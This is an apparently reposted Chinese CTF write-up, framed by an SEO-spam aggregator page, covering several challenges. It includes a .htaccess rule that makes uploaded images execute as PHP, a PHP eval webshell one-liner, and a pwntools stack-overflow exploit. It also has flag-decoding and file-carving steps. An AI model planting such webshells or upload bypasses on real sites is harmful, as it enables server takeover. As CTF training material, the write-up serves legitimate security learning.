您的位置:首页 > 健康 > 美食 > 开发公司审计稽查的内容_网站开发网络_不收费推广网站有哪些_网络seo招聘

开发公司审计稽查的内容_网站开发网络_不收费推广网站有哪些_网络seo招聘

2025/3/11 5:33:30 来源:https://blog.csdn.net/2401_88422349/article/details/145738086  浏览:    关键词:开发公司审计稽查的内容_网站开发网络_不收费推广网站有哪些_网络seo招聘
开发公司审计稽查的内容_网站开发网络_不收费推广网站有哪些_网络seo招聘

Web

easyupload3.0

这是一道构造.htaccess文件的传马
如下:

<FilesMatch "jpg">SetHandler application/x-httpd-php
</FilesMatch>

.htaccess文件可以作为一个解释器,可以将传进去的图片马改为php马在这里插入图片描述上传之后再传个图片马,之后就可以蚁剑了在这里插入图片描述

[极客大挑战 2019]Knife

在这里插入图片描述根据提示构造木马

/?<?php eval($_POST["Syc"]);?>

之后用蚁剑连接即可在这里插入图片描述flag在根目录下

pwn

[BUUCTF]bjdctf_2020_babystack

先用exe看一下在这里插入图片描述64位的exe文件,用ida查看主调函数在这里插入图片描述分析代码发现在read处存在栈溢出
exp:

from pwn import *
io=remote('node2.anna.nssctf.cn',28733)
io.sendlineafter("name:",b'100')
payload=b'a'*(0x10+8)+p64(0x4006E6)
io.sendlineafter("name?",payload)
io.interactive()

re

[SWPUCTF 2021 新生赛]非常简单的逻辑题

题目

flag = 'xxxxxxxxxxxxxxxxxxxxx'
s = 'wesyvbniazxchjko1973652048@$+-&*<>'
result = ''
for i in range(len(flag)):s1 = ord(flag[i])//17s2 = ord(flag[i])%17result += s[(s1+i)%34]+s[-(s2+i+1)%34]
print(result)
# result = 'v0b9n1nkajz@j0c4jjo3oi1h1i937b395i5y5e0e$i'

题目的意思是在for循环中,对flag的ASCII值取整并赋给s1,对flag的ASCII值取余并赋给s2,在进行一个加密算法赋给result。
根据查询ai,分析思路:先在一定范围的ASCII值中,取整取余,分别赋给s1,s2
再定义一个函数命名为res,让其等于加密算法,此时的加密算法i已经不能再用i表示,替换成num
再写一个if判断,res与result的两两分组的值是否相等
exp:

flag = ''
s = 'wesyvbniazxchjko1973652048@$+-&*<>'
result = 'v0b9n1nkajz@j0c4jjo3oi1h1i937b395i5y5e0e$i'
res = ''
num = 0
for j in range(0,len(result),2):for i in range(255):s1 = i//17s2 = i%17res = s[(s1+num)%34]+s[-(s2+num+1)%34]if res == result[j:j+2]:flag += chr(i)num += 1
print(flag)

在这里插入图片描述

misc

[NISACTF 2022]huaji?

用010查看附件发现是个jfif文件在这里插入图片描述用随波逐流一把梭了
在这里插入图片描述发现含有一个zip,内容是叫作flag的文档在这里插入图片描述用binwalk分出来,压缩包是加密的在这里插入图片描述
得到的jpg查看一下exif,发现可疑信息在这里插入图片描述标记处猜一波是密码,结果还真是在这里插入图片描述

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com